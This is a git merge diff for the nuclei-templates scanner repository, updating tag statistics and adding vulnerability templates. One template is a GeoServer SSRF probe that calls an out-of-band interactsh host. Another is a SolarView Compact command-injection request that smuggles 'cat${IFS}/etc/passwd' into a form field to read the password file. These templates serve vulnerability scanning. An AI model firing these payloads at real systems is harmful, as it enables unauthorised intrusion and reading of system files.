Merge branch 'dashboard' of https://github.com/MostInterestingBotInTheWorld/nuclei-templates into dashboard
commit
64a691dbfa
|
@ -3,12 +3,14 @@ cves/2018/CVE-2018-17422.yaml
|
||||||
cves/2021/CVE-2021-20123.yaml
|
cves/2021/CVE-2021-20123.yaml
|
||||||
cves/2021/CVE-2021-20124.yaml
|
cves/2021/CVE-2021-20124.yaml
|
||||||
cves/2021/CVE-2021-25075.yaml
|
cves/2021/CVE-2021-25075.yaml
|
||||||
|
cves/2021/CVE-2021-40822.yaml
|
||||||
cves/2021/CVE-2021-46379.yaml
|
cves/2021/CVE-2021-46379.yaml
|
||||||
cves/2021/CVE-2021-46422.yaml
|
cves/2021/CVE-2021-46422.yaml
|
||||||
cves/2021/CVE-2021-46424.yaml
|
cves/2021/CVE-2021-46424.yaml
|
||||||
cves/2022/CVE-2022-1392.yaml
|
cves/2022/CVE-2022-1392.yaml
|
||||||
cves/2022/CVE-2022-1598.yaml
|
cves/2022/CVE-2022-1598.yaml
|
||||||
cves/2022/CVE-2022-21705.yaml
|
cves/2022/CVE-2022-21705.yaml
|
||||||
|
cves/2022/CVE-2022-29303.yaml
|
||||||
cves/2022/CVE-2022-30489.yaml
|
cves/2022/CVE-2022-30489.yaml
|
||||||
default-logins/octobercms-default-login.yaml
|
default-logins/octobercms-default-login.yaml
|
||||||
exposed-panels/solarview-compact-panel.yaml
|
exposed-panels/solarview-compact-panel.yaml
|
||||||
|
@ -17,5 +19,6 @@ misconfiguration/oracle-ebusiness-registration-enabled.yaml
|
||||||
misconfiguration/unauth-wavink-panel.yaml
|
misconfiguration/unauth-wavink-panel.yaml
|
||||||
misconfiguration/xss-deprecated-header.yaml
|
misconfiguration/xss-deprecated-header.yaml
|
||||||
technologies/kubernetes-operational-view-detect.yaml
|
technologies/kubernetes-operational-view-detect.yaml
|
||||||
|
token-spray/api-chaos.yaml
|
||||||
vulnerabilities/wordpress/seo-redirection-xss.yaml
|
vulnerabilities/wordpress/seo-redirection-xss.yaml
|
||||||
workflows/yonyou-nc-workflow.yaml
|
workflows/yonyou-nc-workflow.yaml
|
||||||
|
|
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
||||||
|
|
||||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||||
| cve | 1156 | daffainfo | 560 | cves | 1160 | info | 1192 | http | 3187 |
|
| cve | 1168 | daffainfo | 564 | cves | 1172 | info | 1198 | http | 3209 |
|
||||||
| panel | 515 | dhiyaneshdk | 421 | exposed-panels | 523 | high | 874 | file | 68 |
|
| panel | 517 | dhiyaneshdk | 423 | exposed-panels | 525 | high | 885 | file | 68 |
|
||||||
| lfi | 461 | pikpikcu | 316 | vulnerabilities | 452 | medium | 662 | network | 50 |
|
| lfi | 464 | pikpikcu | 315 | vulnerabilities | 453 | medium | 667 | network | 50 |
|
||||||
| xss | 367 | pdteam | 262 | technologies | 255 | critical | 414 | dns | 17 |
|
| xss | 371 | pdteam | 262 | technologies | 256 | critical | 415 | dns | 17 |
|
||||||
| wordpress | 364 | geeknik | 179 | exposures | 204 | low | 183 | | |
|
| wordpress | 368 | geeknik | 179 | exposures | 204 | low | 182 | | |
|
||||||
| exposure | 293 | dwisiswant0 | 168 | misconfiguration | 197 | unknown | 6 | | |
|
| rce | 296 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | |
|
||||||
| rce | 291 | princechaddha | 133 | workflows | 186 | | | | |
|
| exposure | 294 | princechaddha | 137 | workflows | 187 | | | | |
|
||||||
| cve2021 | 283 | 0x_akoko | 130 | token-spray | 154 | | | | |
|
| cve2021 | 289 | 0x_akoko | 134 | token-spray | 155 | | | | |
|
||||||
| tech | 271 | gy741 | 118 | default-logins | 95 | | | | |
|
| tech | 272 | gy741 | 119 | default-logins | 96 | | | | |
|
||||||
| wp-plugin | 264 | pussycat0x | 116 | file | 68 | | | | |
|
| wp-plugin | 268 | pussycat0x | 116 | file | 68 | | | | |
|
||||||
|
|
||||||
**261 directories, 3543 files**.
|
**262 directories, 3566 files**.
|
||||||
|
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
|
|
File diff suppressed because one or more lines are too long
3054
TEMPLATES-STATS.md
3054
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
||||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||||
| cve | 1156 | daffainfo | 560 | cves | 1160 | info | 1192 | http | 3187 |
|
| cve | 1168 | daffainfo | 564 | cves | 1172 | info | 1198 | http | 3209 |
|
||||||
| panel | 515 | dhiyaneshdk | 421 | exposed-panels | 523 | high | 874 | file | 68 |
|
| panel | 517 | dhiyaneshdk | 423 | exposed-panels | 525 | high | 885 | file | 68 |
|
||||||
| lfi | 461 | pikpikcu | 316 | vulnerabilities | 452 | medium | 662 | network | 50 |
|
| lfi | 464 | pikpikcu | 315 | vulnerabilities | 453 | medium | 667 | network | 50 |
|
||||||
| xss | 367 | pdteam | 262 | technologies | 255 | critical | 414 | dns | 17 |
|
| xss | 371 | pdteam | 262 | technologies | 256 | critical | 415 | dns | 17 |
|
||||||
| wordpress | 364 | geeknik | 179 | exposures | 204 | low | 183 | | |
|
| wordpress | 368 | geeknik | 179 | exposures | 204 | low | 182 | | |
|
||||||
| exposure | 293 | dwisiswant0 | 168 | misconfiguration | 197 | unknown | 6 | | |
|
| rce | 296 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | |
|
||||||
| rce | 291 | princechaddha | 133 | workflows | 186 | | | | |
|
| exposure | 294 | princechaddha | 137 | workflows | 187 | | | | |
|
||||||
| cve2021 | 283 | 0x_akoko | 130 | token-spray | 154 | | | | |
|
| cve2021 | 289 | 0x_akoko | 134 | token-spray | 155 | | | | |
|
||||||
| tech | 271 | gy741 | 118 | default-logins | 95 | | | | |
|
| tech | 272 | gy741 | 119 | default-logins | 96 | | | | |
|
||||||
| wp-plugin | 264 | pussycat0x | 116 | file | 68 | | | | |
|
| wp-plugin | 268 | pussycat0x | 116 | file | 68 | | | | |
|
||||||
|
|
|
@ -0,0 +1,45 @@
|
||||||
|
id: CVE-2021-40822
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Geoserver - SSRF
|
||||||
|
author: For3stCo1d
|
||||||
|
severity: high
|
||||||
|
description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows SSRF via the option for setting a proxy host.
|
||||||
|
reference:
|
||||||
|
- https://gccybermonks.com/posts/cve-2021-40822/
|
||||||
|
- https://github.com/geoserver/geoserver/compare/2.19.2...2.19.3
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-40822
|
||||||
|
- https://github.com/geoserver/geoserver/releases
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.5
|
||||||
|
cve-id: CVE-2021-40822
|
||||||
|
cwe-id: CWE-918
|
||||||
|
metadata:
|
||||||
|
fofa-query: app="GeoServer"
|
||||||
|
verified: "true"
|
||||||
|
tags: cve2021,ssrf,geoserver,cve
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /geoserver/TestWfsPost HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
form_hf_0=&url=http://{{interactsh-url}}/geoserver/../&body=&username=&password=
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
|
words:
|
||||||
|
- "http"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<html><head></head><body>"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -2,7 +2,7 @@ id: CVE-2021-46422
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: SDT-CW3B1 1.1.0 - OS Command Injection
|
name: SDT-CW3B1 1.1.0 - OS Command Injection
|
||||||
author: remote
|
author: badboycxcc
|
||||||
severity: critical
|
severity: critical
|
||||||
description: |
|
description: |
|
||||||
Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.
|
Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.
|
||||||
|
|
|
@ -0,0 +1,34 @@
|
||||||
|
id: CVE-2022-29303
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SolarView Compact 6.0 - OS Command Injection
|
||||||
|
author: badboycxcc
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
SolarView Compact ver.6.00 was discovered to contain a command injection vulnerability via conf_mail.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/50940
|
||||||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303
|
||||||
|
- https://drive.google.com/drive/folders/1tGr-WExbpfvhRg31XCoaZOFLWyt3r60g?usp=sharing
|
||||||
|
metadata:
|
||||||
|
shodan-query: http.html:"SolarView Compact"
|
||||||
|
verified: "true"
|
||||||
|
tags: cve,cve2022,rce,injection
|
||||||
|
|
||||||
|
variables:
|
||||||
|
cmd: "cat${IFS}/etc/passwd"
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /conf_mail.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
|
@ -16,7 +16,9 @@ headless:
|
||||||
name: extract
|
name: extract
|
||||||
args:
|
args:
|
||||||
code: |
|
code: |
|
||||||
'\n' + [...new Set(Array.from(document.querySelectorAll('[src], [href], [url], [action]')).map(i => i.src || i.href || i.url || i.action))].join('\r\n') + '\n'
|
() => {
|
||||||
|
return '\n' + [...new Set(Array.from(document.querySelectorAll('[src], [href], [url], [action]')).map(i => i.src || i.href || i.url || i.action))].join('\r\n') + '\n'
|
||||||
|
}
|
||||||
extractors:
|
extractors:
|
||||||
- type: kval
|
- type: kval
|
||||||
part: extract
|
part: extract
|
||||||
|
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: api-chaos
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Chaos API Test
|
||||||
|
author: 0ri2N
|
||||||
|
severity: info
|
||||||
|
reference:
|
||||||
|
- https://chaos.projectdiscovery.io/#/docs
|
||||||
|
tags: dns,recon,chaos,token-spray,projectdiscovery
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "https://dns.projectdiscovery.io/dns/projectdiscovery.io"
|
||||||
|
headers:
|
||||||
|
Authorization: "{{token}}"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '"domain":'
|
||||||
|
- '"subdomains":'
|
||||||
|
condition: and
|
Loading…
Reference in New Issue